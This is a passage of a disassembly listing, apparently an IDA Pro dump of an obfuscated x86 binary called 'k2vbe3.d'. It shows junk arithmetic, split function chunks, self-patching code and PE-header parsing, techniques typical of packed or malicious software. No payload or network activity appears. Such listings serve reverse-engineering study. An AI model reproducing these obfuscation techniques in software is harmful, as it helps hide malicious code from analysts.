		jmp	loc_44F62F

; =============== S U B	R O U T	I N E =======================================



sub_45BB9D	proc near		; CODE XREF: sub_44083C+C0A3p
					; k2vbe3.d:004589F5j

; FUNCTION CHUNK AT 00447858 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D328 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459756 SIZE 00000006 BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	eax, 128F323Fh
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_459761
		jmp	loc_44D328
sub_45BB9D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_45BBB7:				; CODE XREF: sub_454E69:loc_4534DAj
		add	edi, 0E19B8D91h
		mov	[edi], eax
		xchg	esi, [esp+0]
		mov	edi, esi
		jmp	loc_44ADBD
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_45BBC9:				; CODE XREF: sub_444EFA+2082j
		jo	loc_43C333
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_446E16
		jmp	loc_45105E
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_45BBE3:				; CODE XREF: sub_443FC1-7183j
		jz	loc_4452EF
		mov	edi, ecx
		sbb	ebx, edi

loc_45BBED:				; CODE XREF: sub_451222:loc_45BDD9j
		mov	eax, 0A2CD59D9h

loc_45BBF2:				; CODE XREF: sub_454E83:loc_452FF8j
		jmp	loc_44752A
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_45B2F1
		jmp	loc_43CA0F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_45BC04:				; CODE XREF: sub_43DEBE:loc_44CA00j
		jz	loc_4446E6
		jmp	loc_44C44E
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A4C1

loc_45BC0F:				; CODE XREF: sub_45A4C1-5B58j
		jz	loc_458157

loc_45BC15:				; CODE XREF: k2vbe3.d:0044971Fj
		jmp	loc_441D28
; END OF FUNCTION CHUNK	FOR sub_45A4C1
; ---------------------------------------------------------------------------

loc_45BC1A:				; CODE XREF: k2vbe3.d:004444D7j
		jmp	locret_44A5E0
; ---------------------------------------------------------------------------
		test	edi, 2F5D7DB1h
		jmp	loc_457774
; ---------------------------------------------------------------------------

loc_45BC2A:				; CODE XREF: k2vbe3.d:loc_4440A0j
		jnz	loc_450CDA
		jmp	loc_4596E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_45BC35:				; CODE XREF: sub_44B94B:loc_45B24Dj
		or	eax, eax
		jnz	loc_448A69
		jmp	loc_4546FF
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------

loc_45BC42:				; CODE XREF: k2vbe3.d:loc_455B43j
		push	edx
		call	sub_445047
		mov	eax, 78BDA40Ah
		call	sub_4553CC
		mov	ds:dword_41E108, eax
		lea	eax, nullsub_283
		mov	byte ptr [eax],	0C3h

loc_45BC61:				; CODE XREF: k2vbe3.d:00456096j
		jmp	loc_457645
; ---------------------------------------------------------------------------
		test	al, al
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_45BC68:				; CODE XREF: sub_441D41+6EC6j
		jz	loc_457E92
		jmp	loc_44AD3F
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA2C

loc_45BC73:				; CODE XREF: sub_43FA2C+20B2j
		push	0F909E778h
		pop	eax
		add	eax, 69DE1905h
		rol	eax, 1Ch
		add	eax, 2A1641B0h
		jmp	loc_451883
; END OF FUNCTION CHUNK	FOR sub_43FA2C
; ---------------------------------------------------------------------------

locret_45BC8D:				; CODE XREF: k2vbe3.d:loc_449805j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA2C

loc_45BC8E:				; CODE XREF: sub_43FA2C+11E5Aj
		jmp	sub_453347
; END OF FUNCTION CHUNK	FOR sub_43FA2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_45BC93:				; CODE XREF: sub_44471B+342Fj
		jmp	loc_441621
; END OF FUNCTION CHUNK	FOR sub_44471B

; =============== S U B	R O U T	I N E =======================================



sub_45BC98	proc near		; CODE XREF: sub_45512F-DE1Ep
					; k2vbe3.d:00450BF0j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004486A8 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044BD8D SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00450D0A SIZE 0000001C BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		ror	eax, 1Ch
		sub	eax, 0ABA5147h
		jmp	loc_450D0A
sub_45BC98	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45BCAA:				; CODE XREF: k2vbe3.d:0045C3A3j
		mov	edx, ecx
		xchg	edx, [esp]
		push	3D6C5894h
		pop	ecx
		xor	ecx, 293CB042h
		rol	ecx, 7
		jmp	loc_441EFD
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 1Bh
		mov	ds:dword_43FA64, eax
		retn
; ---------------------------------------------------------------------------

loc_45BCCE:				; CODE XREF: k2vbe3.d:00440054j
		jmp	sub_455F6B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_230. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459FFC

loc_45BCD4:				; CODE XREF: sub_459FFC-101A8j
		jmp	loc_454690
; END OF FUNCTION CHUNK	FOR sub_459FFC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_45BCD9:				; CODE XREF: sub_43DA1E+8B7Ej
		jmp	nullsub_442
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441885

loc_45BCDE:				; CODE XREF: sub_44469A-3AD4j
					; sub_441885:loc_449F4Cj
		jmp	loc_45C225
; END OF FUNCTION CHUNK	FOR sub_441885
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8EF

loc_45BCE3:				; CODE XREF: sub_44B8EF+784Dj
		jz	loc_446D24
		jmp	loc_441453
; END OF FUNCTION CHUNK	FOR sub_44B8EF
; ---------------------------------------------------------------------------

loc_45BCEE:				; CODE XREF: k2vbe3.d:004443F1j
		sbb	edi, edx

; =============== S U B	R O U T	I N E =======================================



sub_45BCF0	proc near		; CODE XREF: k2vbe3.d:0045C19Ap

; FUNCTION CHUNK AT 00445518 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044563B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449436 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044C893 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044E1B8 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	ecx, ebp
		add	ecx, 71FFA7A0h
		jmp	loc_44E1B8
sub_45BCF0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_45BD01:				; CODE XREF: sub_44E0F6+BD04j
		call	sub_452D37

loc_45BD06:				; DATA XREF: sub_44B335+Ao
		xchg	eax, [esp+0]
		jmp	sub_444FB1
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------

loc_45BD0E:				; CODE XREF: k2vbe3.d:004525B2j
		mov	eax, 462C961Fh
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_45BD13:				; CODE XREF: sub_454E69-8398j
		push	edi
		push	0F9474F52h
		pop	edi
		jmp	loc_45821F
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
		and	ecx, 317E80B7h
		shr	ecx, 1Fh
		add	ecx, 0EC9E9122h
		jmp	loc_440FAC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DAF

loc_45BD33:				; CODE XREF: sub_458DAF-4724j
		call	sub_452693
; END OF FUNCTION CHUNK	FOR sub_458DAF

; =============== S U B	R O U T	I N E =======================================



sub_45BD38	proc near		; CODE XREF: k2vbe3.d:00448CB2p
					; k2vbe3.d:00450F6Cj
		xchg	eax, [esp+0]
		pop	eax
		push	eax
		push	6CADC3Eh
		pop	eax
		and	eax, 0CEAD9769h
		jmp	loc_453B34
sub_45BD38	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4504F3

loc_45BD4E:				; CODE XREF: sub_4504F3:loc_44F988j
		add	edi, 0DE5D81BBh
		xchg	edi, [esp+0]
		jmp	sub_43DA01
; END OF FUNCTION CHUNK	FOR sub_4504F3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_170. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_45BD5D:				; CODE XREF: sub_451CF1+5D2Dj
		jmp	loc_43C58D
; END OF FUNCTION CHUNK	FOR sub_451CF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_45BD62:				; CODE XREF: sub_447E07+ACEDj
		jmp	loc_443DC2
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_45BD67:				; CODE XREF: sub_4553CC-957Cj
		jmp	loc_43D9BF
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_45BD6C:				; CODE XREF: sub_43DA1E+BFEEj
		jmp	loc_4482A3
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------

loc_45BD71:				; CODE XREF: k2vbe3.d:00451523j
		jnz	loc_4512A7
; START	OF FUNCTION CHUNK FOR sub_449372

loc_45BD77:				; CODE XREF: sub_449372-1A2j
		jmp	sub_4402FA
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
		jns	loc_453588
		jmp	loc_451298

; =============== S U B	R O U T	I N E =======================================



sub_45BD87	proc near		; CODE XREF: k2vbe3.d:00443DF1j
					; sub_44D0D5:loc_44E33Fp

; FUNCTION CHUNK AT 0045254C SIZE 00000017 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	ecx
		push	36B713B0h
		pop	ecx
		jmp	loc_45254C
sub_45BD87	endp

; ---------------------------------------------------------------------------
		xchg	eax, esi
		shr	esi, 1Ch
		jmp	sub_458725
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DD4

loc_45BDA1:				; CODE XREF: sub_448DD4:loc_448803j
		mov	eax, [ebp-4]
		add	eax, 3Ch
		mov	eax, [eax]
		add	eax, [ebp-4]
		add	eax, 18h
		jmp	loc_44913F
; ---------------------------------------------------------------------------

loc_45BDB4:				; CODE XREF: sub_448DD4:loc_44871Bj
		xor	eax, eax
		jmp	loc_44769D
; END OF FUNCTION CHUNK	FOR sub_448DD4
; ---------------------------------------------------------------------------

loc_45BDBB:				; CODE XREF: k2vbe3.d:loc_444A01j
		mov	[eax], ebp
		jmp	loc_44CCFB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BDBB

loc_45BDC2:				; CODE XREF: sub_44BDBB+D1B4j
		rol	esi, 13h
		xor	esi, 7583A87Ch
		xor	eax, esi
		pop	esi
		add	eax, 0E7E6FDA7h
		jmp	loc_4518F1
; END OF FUNCTION CHUNK	FOR sub_44BDBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451222

loc_45BDD9:				; CODE XREF: sub_451222+8j
		jz	loc_45BBED
		jmp	loc_449D25
; END OF FUNCTION CHUNK	FOR sub_451222

; =============== S U B	R O U T	I N E =======================================



sub_45BDE4	proc near		; CODE XREF: sub_445124-5B0Ap
					; sub_445124:loc_454538p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044167B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004455C0 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00449341 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044BBA0 SIZE 00000005 BYTES

		jnz	sub_442DA4
		push	edx
		push	ebp
		pop	edx
		jmp	loc_44BBA0
sub_45BDE4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E360

loc_45BDF2:				; CODE XREF: sub_43E360:loc_443A90j
		mov	eax, ebp
		xchg	esi, [esp+0]
		mov	ebp, esi
		pop	esi
		pop	eax
		jmp	loc_449162
; END OF FUNCTION CHUNK	FOR sub_43E360
; ---------------------------------------------------------------------------

loc_45BE00:				; CODE XREF: k2vbe3.d:0043C50Ej
		or	ebx, 0CA475562h
		add	ebx, 0D0C8989Ah
		jnz	loc_454611
; START	OF FUNCTION CHUNK FOR sub_458D4F

loc_45BE12:				; CODE XREF: sub_458D4F-110D0j
		jmp	loc_456903
; END OF FUNCTION CHUNK	FOR sub_458D4F
; ---------------------------------------------------------------------------

loc_45BE17:				; CODE XREF: k2vbe3.d:0043E794j
		jmp	loc_43F584
; ---------------------------------------------------------------------------
		sub	ecx, 0E00533D1h
		jmp	loc_45460B
; ---------------------------------------------------------------------------

loc_45BE27:				; DATA XREF: sub_43CD01+F1B4o
		add	ecx, 0F18DC421h
		or	ebx, ecx
		xchg	edx, [esp]
		mov	ecx, edx
		pop	edx
		jmp	loc_452BD5
; ---------------------------------------------------------------------------

loc_45BE3A:				; CODE XREF: k2vbe3.d:00455DE3j
		sub	ebx, 535EE373h
		xor	ebx, 0B79A7801h
		sub	ebx, 2F09F947h
		add	ebx, 0A07C5F9Bh
		mov	[ebx], eax
		xchg	ecx, [esp]
		jmp	loc_441ED1

; =============== S U B	R O U T	I N E =======================================



sub_45BE5C	proc near		; CODE XREF: k2vbe3.d:0043FB90j
					; sub_44D0D5+7p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044F402 SIZE 00000011 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	eax, [esp-4+arg_0]
		push	ecx
		jmp	loc_44F402
sub_45BE5C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_45BE69:				; CODE XREF: sub_4467A1:loc_452647j
		call	sub_44A79B
		test	eax, eax
		jz	loc_452576
		jmp	loc_43D33F
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A2AF

loc_45BE7B:				; CODE XREF: sub_45A2AF+Fj
		pop	ebx
		rol	ebx, 12h
		test	ebx, 400000h
		jmp	loc_459703
; END OF FUNCTION CHUNK	FOR sub_45A2AF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_45BE8A:				; CODE XREF: sub_4580DF-258Bj
		jnb	loc_45035C
		popf
		shl	esi, 13h
; END OF FUNCTION CHUNK	FOR sub_4580DF

; =============== S U B	R O U T	I N E =======================================



sub_45BE94	proc near		; CODE XREF: sub_4580DF:loc_44033Bj

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00443589 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00444F98 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00445513 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446672 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00448B32 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448CD8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044BA7B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044CDDF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D3F1 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044D7ED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F27D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00450315 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458D40 SIZE 0000000F BYTES

		push	ebx
		mov	ebx, eax
		jmp	loc_443589
sub_45BE94	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A634

loc_45BE9C:				; CODE XREF: sub_45A634-6811j
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_43CE7F
		jmp	loc_44A40D
; END OF FUNCTION CHUNK	FOR sub_45A634
; ---------------------------------------------------------------------------
		mov	eax, [ebx]
		jmp	sub_45AA25
; ---------------------------------------------------------------------------
		and	edi, esi
		jmp	sub_458019
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_45BEB9:				; CODE XREF: sub_44CA34:loc_452D32j
		add	eax, 0AEA32D49h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_454975
		jmp	loc_4427B5
; END OF FUNCTION CHUNK	FOR sub_44CA34
; ---------------------------------------------------------------------------

loc_45BECE:				; CODE XREF: k2vbe3.d:004594E4j
		jz	loc_456E16

loc_45BED4:				; CODE XREF: k2vbe3.d:loc_4594CFj
		sub	ebx, 0E70E691Bh
		add	ebx, 19542133h
		xchg	ebx, [esp]
		jmp	sub_444615
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459F85

loc_45BEE8:				; CODE XREF: sub_459F85+4j
		shr	edx, cl
		or	eax, edx
		mov	edx, [ebp-8]
		mov	[edx], al

loc_45BEF1:				; CODE XREF: k2vbe3.d:loc_44632Cj
		mov	eax, [ebp-8]
		mov	al, [eax]
		jmp	loc_4420AB
; END OF FUNCTION CHUNK	FOR sub_459F85
; ---------------------------------------------------------------------------

loc_45BEFB:				; CODE XREF: k2vbe3.d:00452476j
		jno	loc_44B20C

; =============== S U B	R O U T	I N E =======================================



sub_45BF01	proc near		; CODE XREF: sub_43D45F+D3A0p

; FUNCTION CHUNK AT 0043FD7E SIZE 00000011 BYTES

		xchg	esi, [esp+0]
		pop	esi
		pop	ecx

loc_45BF06:				; CODE XREF: sub_443BDF+EAA7j
		ror	eax, 0Ah
		xor	eax, 871B08C4h
		add	eax, 2CD974DFh
		ror	eax, 6
		jmp	loc_43FD7E
sub_45BF01	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_45BF1D:				; CODE XREF: sub_44471B+DD52j
		rol	edi, 1
		add	edi, 94C39BCEh
		and	edi, 3109026Ah
		add	edi, 0EEFEFDB9h
		jmp	loc_443C55
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_45BF36:				; CODE XREF: sub_44B912+726Cj
		jnz	loc_455C94
		jmp	loc_443D49
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_45BF41:				; CODE XREF: sub_43F7AC+CD15j
		jz	loc_445F3E
		jmp	loc_43D1A8
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44601F

loc_45BF4C:				; CODE XREF: sub_44601F+10j
		call	sub_451759
		mov	ds:off_41E000, eax
		lea	eax, loc_453C34
		mov	byte ptr [eax],	0C3h
		jmp	loc_450EEC
; END OF FUNCTION CHUNK	FOR sub_44601F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_45BF65:				; CODE XREF: sub_443F0D:loc_453C34j
		pop	edx
		jmp	loc_44CB3D
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB7E

loc_45BF6B:				; CODE XREF: sub_45AB7E:loc_44799Cj
		jz	loc_43EA14

loc_45BF71:				; CODE XREF: sub_454AD4+7848j
		jmp	nullsub_450
; END OF FUNCTION CHUNK	FOR sub_45AB7E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45725F

loc_45BF76:				; CODE XREF: sub_45725F-453Bj
		jmp	sub_4427BF
; END OF FUNCTION CHUNK	FOR sub_45725F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_45BF7B:				; CODE XREF: sub_4570C0-14BADj
		jmp	loc_43EF88
; END OF FUNCTION CHUNK	FOR sub_4570C0
; ---------------------------------------------------------------------------
		not	ebp
		rol	edx, 0Ah
		adc	ebp, ecx
		jmp	loc_43EA13
; ---------------------------------------------------------------------------

loc_45BF8C:				; CODE XREF: k2vbe3.d:00455AC5j
		jnz	loc_44399C
		shr	esi, 8
		rol	edx, 9
		jmp	loc_443992
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459347

loc_45BF9D:				; CODE XREF: sub_459347+Dj
		pop	edx
		pop	ebx
		call	sub_452719
; END OF FUNCTION CHUNK	FOR sub_459347
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_45BFA4:				; CODE XREF: sub_444D7B+90B5j
		jmp	loc_456A72
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_45BFA9:				; CODE XREF: sub_443A30-5098j
		jmp	loc_44A54E
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------

loc_45BFAE:				; CODE XREF: k2vbe3.d:loc_44B36Ej
		pop	edx
		add	edx, 0C9375A71h
		xor	edx, 1177ADD0h
		add	edx, 9D8B810Dh
		and	edx, 0CC6366BAh
		push	offset sub_43CDCB
		jmp	locret_4432C5
; ---------------------------------------------------------------------------

loc_45BFD1:				; CODE XREF: k2vbe3.d:loc_4541E7j
		push	ecx
		push	9A70083Bh
		pop	ecx
		rol	ecx, 0Ch
		xor	ecx, 0D277564h
		add	ecx, 0F2A09AE5h
		xchg	ecx, [esp]
		jmp	sub_44E481
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_264. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FBB2

loc_45BFF0:				; CODE XREF: sub_44FBB2+1Ej
		jmp	loc_45A989
; END OF FUNCTION CHUNK	FOR sub_44FBB2
; ---------------------------------------------------------------------------
		and	esi, edx
		jmp	sub_448472
; ---------------------------------------------------------------------------

loc_45BFFC:				; CODE XREF: k2vbe3.d:00453EECj
		xor	edx, 5FB0737Dh

; =============== S U B	R O U T	I N E =======================================



sub_45C002	proc near		; CODE XREF: k2vbe3.d:0044C084p

; FUNCTION CHUNK AT 00449948 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455E09 SIZE 0000001D BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	47D477DFh
		pop	ebx
		or	ebx, 9DEF4060h
		rol	ebx, 2
		jmp	loc_449948
sub_45C002	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452CF7

loc_45C01A:				; CODE XREF: sub_452CF7:loc_449E90j
		add	eax, 0AC22E2A3h
		rol	eax, 10h
		or	eax, 0BDE43BEEh

loc_45C029:				; CODE XREF: k2vbe3.d:loc_451C23j
		xor	eax, 8E98AAFh
		add	eax, ebp
		call	sub_44D8E0
; END OF FUNCTION CHUNK	FOR sub_452CF7
; START	OF FUNCTION CHUNK FOR sub_43FF90

loc_45C036:				; CODE XREF: sub_43FF90+13j
		jmp	loc_44D46E
; END OF FUNCTION CHUNK	FOR sub_43FF90
; ---------------------------------------------------------------------------

loc_45C03B:				; CODE XREF: k2vbe3.d:00444520j
		xor	edi, 0EC9B80AFh

; =============== S U B	R O U T	I N E =======================================



sub_45C041	proc near		; CODE XREF: sub_442D04:loc_458341p

; FUNCTION CHUNK AT 00442731 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00448435 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044ACAA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044BCEE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D18E SIZE 00000024 BYTES
; FUNCTION CHUNK AT 004506BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004507BF SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451A57 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452104 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045261B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00455064 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456506 SIZE 00000012 BYTES

		xchg	edi, [esp+0]
		pop	edi
		xor	edi, 1650699Ch
		add	edi, ebp
		add	edi, 0D4DA0279h
		jmp	loc_45261B
sub_45C041	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45C058:				; CODE XREF: k2vbe3.d:0044EA34j
		or	esi, 0F659032Bh
		jle	loc_454129
		or	edx, 0A0FA2AF3h

loc_45C06A:				; CODE XREF: k2vbe3.d:0044D7B6j
		or	ecx, 0DBC876E1h
		add	ecx, 448526Eh
		xchg	ecx, [esp]
		jmp	sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_45C07E:				; CODE XREF: sub_44469A+5CC0j
		jnz	loc_440BBA
		jmp	loc_448F26
; END OF FUNCTION CHUNK	FOR sub_44469A

; =============== S U B	R O U T	I N E =======================================



sub_45C089	proc near		; CODE XREF: k2vbe3.d:004545AEj
					; sub_457B49+6p

; FUNCTION CHUNK AT 0043C655 SIZE 0000000F BYTES

		xchg	eax, [esp+0]
		pop	eax
		xor	eax, ebx
		add	eax, ecx
		xor	eax, esi

loc_45C093:				; CODE XREF: sub_44B979:loc_44DD5Ej
		add	eax, edi
		add	al, ah
		jmp	loc_43C655
sub_45C089	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	[edi], eax
		xor	edx, ebp
		jmp	sub_459DAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_45C0A5:				; CODE XREF: sub_44128B+C95Aj
		jg	loc_43FB4F
		not	ebp
		xor	esi, ecx
		xchg	edx, [ebx]

loc_45C0B1:				; CODE XREF: sub_44128B:loc_43C0A5j
		mov	eax, [esp+0]
		push	eax
		push	offset sub_4472D9
		jmp	loc_43FA98
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443CD9

loc_45C0BF:				; CODE XREF: sub_443CD9+24A8j
		mov	eax, [ebp-4]
		mov	al, [eax]
		and	al, 0F6h
		cmp	al, 0C2h
		jmp	loc_45509B
; END OF FUNCTION CHUNK	FOR sub_443CD9

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45C0CD	proc near		; CODE XREF: sub_44B4E4j

var_18		= dword	ptr -18h
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C396 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0043CE67 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044195C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00442A5D SIZE 0000001C BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cmp	ds:dword_442828, 0
		jnz	loc_44195C
		jmp	loc_44BD27
sub_45C0CD	endp

; ---------------------------------------------------------------------------

loc_45C0E5:				; DATA XREF: k2vbe3.d:00442EC9o
		push	eax
		cmp	edx, ebx
		shl	edx, 2
		push	offset loc_4401A9
		jmp	locret_45300E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_285. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45C0F6:				; CODE XREF: k2vbe3.d:0044A968j
		jmp	locret_448EAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F31

loc_45C0FB:				; CODE XREF: sub_442F31:loc_44C17Fj
					; sub_4570C0-197Bj
		jz	loc_45645D
		jmp	loc_4483CC
; END OF FUNCTION CHUNK	FOR sub_442F31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_45C106:				; CODE XREF: sub_44F028:loc_458004j
		or	eax, 8B61997Eh
		shl	edx, 0Dh
		pop	eax
		jbe	loc_4478DE
		add	eax, 0A2D02CA4h
		jmp	loc_44241E
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_45C121:				; CODE XREF: sub_443F0D-486Ej
		add	eax, 52779382h
		or	eax, 0AE1B58C3h
		add	eax, 1F79773Ch
		call	sub_451759
		mov	ds:off_41E000, eax
		lea	eax, loc_453C34

loc_45C144:				; CODE XREF: sub_43FECA+128B3j
		mov	byte ptr [eax],	0C3h
		jmp	loc_44DCE1
; END OF FUNCTION CHUNK	FOR sub_443F0D

; =============== S U B	R O U T	I N E =======================================



sub_45C14C	proc near		; DATA XREF: k2vbe3.d:00453B8Ao

; FUNCTION CHUNK AT 00451068 SIZE 0000000B BYTES

		mov	edx, 0F2B89A19h
		push	eax
		push	69F6566Fh
		pop	eax
		rol	eax, 0Bh
		sub	eax, 30ACE6D0h
		and	eax, 3897B95Bh
		jmp	loc_451068
